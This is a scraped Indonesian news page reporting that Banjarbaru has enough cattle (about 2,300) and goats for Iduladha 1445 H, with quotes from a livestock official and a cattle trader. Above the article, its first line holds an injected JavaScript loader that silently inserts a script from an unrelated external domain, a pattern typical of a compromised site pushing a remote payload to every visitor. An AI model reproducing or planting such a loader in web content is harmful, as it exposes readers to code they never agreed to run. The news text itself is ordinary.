(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Ketersediaan Hewan Kurban di Banjarbaru Mencukupi, Sapi Ada 2.300 Ekor


KANALKALIMANTAN.COM, BANJARBARU – Ketersedian hewan sapi di Kota Banjarbaru Kalimantan Selatan (Kalsel) mencukupi untuk pelaksanaan ibadah kurban Idulaha 1445 hijriah yang tersisa kurang lebih sepekan.

Kepala Bidang (Kabid) Peternakan di Dinas Ketahanan Pangan, Pertanian, dan Perikanan (DKP3) Banjarbaru Banjarbaru, drh Yohana Kriswinantu menyebutkan, ketersediaan hewan sapi menjelang Iduladha terdata sebanyak 2.300 ekor.

“Dari data yang kami kumpulkan, baik dari masyarakat maupun pedagang, ketersediaan sapi menjelang kurban yakni untuk sapi sekitar 2.300 ekor, sedangkan kambing ada 1.800 ekor,” ujar drh Yohana Kriswinantu.

Baca juga: Cuci Uang Mantan Bupati Kukar Rita Widyasari: 91 Mobil dan 30 Jam Tangan Mewah Disita KPK

Stok angka itu kata Yohana, melebihi dari pembeli pada tahun 2023 lalu, dimana yang terdata ada 1.200 sapi dan kambing sekitar 700-an ekor yang dipotong.

“Jadi ketersediaan cukup saja,” ungkapnya.

Heru Akbar Safrin, peternak sapi. Foto: wanda

Sementara itu, salah satu peternak sapi di Banjarbaru, Heru Akbar Safrin mengaku menyediakan sekitar 800-an ekor sapi untuk hari raya kurban tahun ini.

“Harga kita jual dari Rp15 juta sampai Rp 24 juta, di bawah itu menawar juga bisa kita layani. Penjualan kurang lebih menjelang kurban ini per hari biasanya dapat 20 ekor, untuk sekitar Banjarbaru, Martapura sampai Banjarmasin,” ujar Heru Akbar Safrin saat ditemui, Jumat (7/6/2024) siang.

Baca juga: Empat Sungai Meluap, Banjir di Tanbu Rendam 24 Desa

Menurutnya, ketersediaan sapi untuk kurban tahun ini menurun dibandingkan tahun lalu, dimana dirinya menyediakan sapi mencapai 1.000 ekor.

“Karena susah carinya, juga kita dari NTT dan NTB, kemudian kendala kapal yang antre banyak mau ngirim jadi kita kadang dapat giliran kadang enggak,” sebut dia.

Sampai hari ini, sebut Heri, stok sapi di kandangnya hanya tersisa dari 30-50 ekor.

Dia mulai akan mendistrbusikan sapi-sapi tersebut kepada pemesan mulai dari H-3 hari raya, bahkan di H+3 masih didistribusikan.

Baca juga: Disdik Banjarbaru Catat 1.500 Anak Tidak Sekolah

“Karena kita mengantar pas hari H maka kita include biaya kasih makan perawatan jadi untuk kurban agak mahal sedikit, tapi Alhamdulillah sudah diperiksa semua oleh dinas,” jelasnya.

Heri memastikan ratusan hewan ternak miliknya sudah dicek kesehatan oleh DKP3 Banjarbaru.

Baca juga: Budi Doremi Bakal Tampil di Peluncuran Pilwali Banjarmasin 2024

“Kalau sapi NTB ini kan sudah divaksin dari daerah asalnya, kalau sapi NTT vaksin setelah sampai di sini,” tuntas Heru. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Pemkab Gelar Pisah Sambut Kapolres Banjar, AKBP Dr Fadli Gantikan AKBP Ifan Hariyat

KANALKALIMANTAN.COM, MARTAPURA - Pisah sambut Kapolres Banjar dari AKBP M Ifan Hariyat kepada AKBP Dr… Read More

3 jam ago

Pemerintah Berikan Pemutihan Denda Pajak pada 2025, Ini Ketentuannya!

KANALKALIMANTAN.COM - Pemerintah kembali menghadirkan kebijakan pemutihan denda pajak sebagai langkah strategis untuk meningkatkan kepatuhan… Read More

4 jam ago

Warga Tak Tahu Ada PSU, ‘PR’ KPU Kalsel Ajak Pemilih Datangi TPS

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Provinsi Kalimantan Selatan (Kalsel) punya 'pekerjaan rumah' berat… Read More

17 jam ago

Minta Dakwaan Tunggal Pasal Pembunuham Berencana ke Jumran

KANALKALIMANTAN.COM, BANJARBARU - Tim kuasa hukum Juwita wartawati media online meminta Oditurat Militer (Odmil) III-15… Read More

18 jam ago

Buka Bimbingan Manasik Haji, Ini Pesan Bupati HSU ke Calon Jemaah Haji

KANALKALIMANTAN.COM, AMUNTAI - Bupati Hulu Sungai Utara (HSU) H Sahrujani membuka bimbingan manasik haji bagi… Read More

21 jam ago

Dipastikan Dipecat, Sidang Jumran di Pengadilan Militer Secara Terbuka

KANALKALIMANTAN.COM, BANJARBARU - Tersangka Kelasi I Bahari Jumran dipastikan dipecat  sebagai anggota TNI Angkatan Laut… Read More

22 jam ago

This website uses cookies.